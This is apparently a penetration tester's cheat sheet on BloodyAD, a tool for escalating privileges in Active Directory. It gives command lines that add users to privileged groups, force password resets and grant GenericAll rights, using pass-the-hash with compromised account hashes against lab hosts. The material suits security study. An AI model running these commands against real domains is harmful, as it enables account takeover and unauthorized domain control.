BloodyAD

BloodyAD is an Active Directory Privilege Escalation Framework

BloodyAD can be used as an alternative to PowerView to execute (for example) the following actions:

Add member to group (AddMember)
Set new password for user (ForceChangePassword)

This is possible from Kali, this makes it so you don't need to execute PowerView commands from a compromised host.

Add member to group (pass the hash)

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "ZPH-SVRMGMT1$" -p 00000000000000000000000000000000:89d0b56874fAAAAA8bad336a77b8ef2f add groupMember 'GENERAL MANAGEMENT' 'Marcus'

Where -u and -p contain credentials of a compromised machine account.

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "JAMIE" -p Password123\! add groupMember 'CA MANAGERS' 'JAMIE'

Force change password

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "Marcus" -p Password123 set password Jamie Password123\!

Where -u and -p contain credentials of a compromised user.

Add GenericAll

We add our user pentest1 to the group utilizing a PTH attack:

python3 bloodyAD.py --host "10.70.2.21" -d "FAKE.intra" -u "DC01$" -p :73d6af...b3a0d689a add genericAll "ENTERPRISE KEY ADMINS" "pentest1"

GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation FrameworkGitHub

Last updated 1 year ago